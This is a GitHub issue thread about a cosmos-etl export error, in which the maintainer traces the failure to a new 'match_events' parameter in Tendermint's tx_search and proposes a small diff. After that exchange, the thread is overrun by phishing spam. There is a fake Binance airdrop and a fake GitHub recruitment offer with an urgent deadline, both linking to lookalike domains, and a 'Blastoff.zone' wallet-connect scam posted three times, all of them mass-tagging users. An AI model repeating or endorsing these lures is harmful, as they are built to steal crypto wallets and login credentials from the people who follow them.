### ISSUE TITLE
Error while exporting transactions and events

### ISSUE THREAD

**Issue by jayesh423** [bizzyvinci/cosmos-etl#2]
Hi,

Thanks for building this package. I've been using it to get data from cosmos. I am running into an error which I couldn't get through. Do you know how I can resolve it? It seems like something is wrong with either data or code. 

cosmosetl export_transactions_and_events -s 17767000 -e 17767045 -p provider_url -to tran
sactions.csv -eo events.csv
2023-11-21 13:36:56,784 - ProgressLogger [INFO] - Started work. Items to process: 46.
Traceback (most recent call last):
  File "/home/ubuntu/work_space/etl_venv/bin/cosmosetl", line 33, in <module>
    sys.exit(load_entry_point('ethereum-etl', 'console_scripts', 'cosmosetl')())
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/click/core.py", line 1128, in __call__
    return self.main(*args, **kwargs)
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/click/core.py", line 1053, in main
    rv = self.invoke(ctx)
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/click/core.py", line 1659, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/click/core.py", line 1395, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/click/core.py", line 754, in invoke
    return __callback(*args, **kwargs)
  File "/home/ubuntu/work_space/buttercup/cosmosetl/cli/export_transactions_and_events.py", line 31, in export_transactions_and_events
    job.run()
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/blockchainetl_common/jobs/base_job.py", line 30, in run
    self._end()
  File "/home/ubuntu/work_space/buttercup/cosmosetl/jobs/export_transactions_job.py", line 60, in _end
    self.batch_work_executor.shutdown()
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/blockchainetl_common/executors/batch_work_executor.py", line 96, in shutdown
    self.executor.shutdown()
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/blockchainetl_common/executors/fail_safe_executor.py", line 39, in shutdown
    self._check_completed_futures()
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/blockchainetl_common/executors/fail_safe_executor.py", line 47, in _check_completed_futures
    future.result()
  File "/usr/lib/python3.10/concurrent/futures/_base.py", line 451, in result
    return self.__get_result()
  File "/usr/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
    raise self._exception
  File "/usr/lib/python3.10/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/home/ubuntu/work_space/etl_venv/lib/python3.10/site-packages/blockchainetl_common/executors/batch_work_executor.py", line 62, in _fail_safe_execute
    work_handler(batch)
  File "/home/ubuntu/work_space/buttercup/cosmosetl/jobs/export_transactions_job.py", line 39, in _export_batch
    for block in results:
  File "/home/ubuntu/work_space/buttercup/cosmosetl/utils.py", line 77, in rpc_response_batch_to_results
    yield rpc_response_to_result(response_item)
  File "/home/ubuntu/work_space/buttercup/cosmosetl/utils.py", line 67, in rpc_response_to_result
    raise ValueError(error_message)
ValueError: result is None in response {'error': {'code': -32602, 'data': 'error converting json params to arguments: expected 6 parameters ([query prove page per_page order_by match_events]), got 5 ([[34 116 120 46 104 101 105 103 104 116 61 49 55 55 54 55 48 48 48 34] [116 114 117 101] [34 49 34] [34 49 48 48 34] [34 97 115 99 34]])', 'message': 'Invalid params'}, 'id': 0, 'jsonrpc': '2.0'}.

**Comment by jayesh423** [comment]
tagging @bizzyvinci

**Comment by bizzyvinci** [comment]
The issue is likely because of `-p provider_url`. provider_url is a variable, the URI of tendermint RPC.
Which chain are you working on?
Look for the tendermint RPC and let me know if you're still facing the issue.

**Comment by jayesh423** [comment]
I provided the URI while I ran the command. I was using Cosmos Hub RPC endpoint as my provider url. I am able to get blocks data using that URI and ran into errors while exporting transactions.

**Comment by bizzyvinci** [comment]
`tx_search` now has a new parameter called `match_events`. You can compare [0.33](https://docs.tendermint.com/v0.34/rpc/#/Info/tx_search) against the latest [0.34](https://docs.tendermint.com/v0.34/rpc/#/Info/tx_search).

The place to resolve the issue is by updating params in [json_rpc_requests.generate_tx_search_by_height_json_rpc](https://github.com/bizzyvinci/cosmos-etl/blob/d55f4b7eb14acf8319af69af9102ff1bde61a872/cosmosetl/json_rpc_requests.py#L26). And we can set it to true or false

```diff
- params=["tx.height=%d" % height, True, str(page), str(per_page), "asc"],
+ params=["tx.height=%d" % height, True, str(page), str(per_page), "asc", True],

## OR ## 

- params=["tx.height=%d" % height, True, str(page), str(per_page), "asc"],
+ params=["tx.height=%d" % height, True, str(page), str(per_page), "asc", False],
```

The default value is false and we should prolly go with that. This [PR](https://github.com/tendermint/tendermint/pull/9759) should give you a better understanding.

You can make the final decision and send a PR.

**Comment by jayesh423** [comment]
Thanks- let me check it out.

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @BeimingYonyu, @stephenki, @jwcastillo, @ShibamCrS, @nguyenvanhai-0911, @vladcaye, @rkmasiello

**Comment by smcgive** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
vyecan, @adamnmcc, @0xfcryowbk2ca65z, @kallydev, @TgeaUs, @mds1, @huynhducduy, @topdzd, @TobiasBK, @superabhinav, @jungs1, @tlkahn, @dguido, @neslinesli93, @ScorpioTM, @mentalrob, @zmeghji, @aaro135, @huazhuangnan, @akhilmantha

**Comment by machine0083** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!

**Comment by machine0083** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!

**Comment by machine0083** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
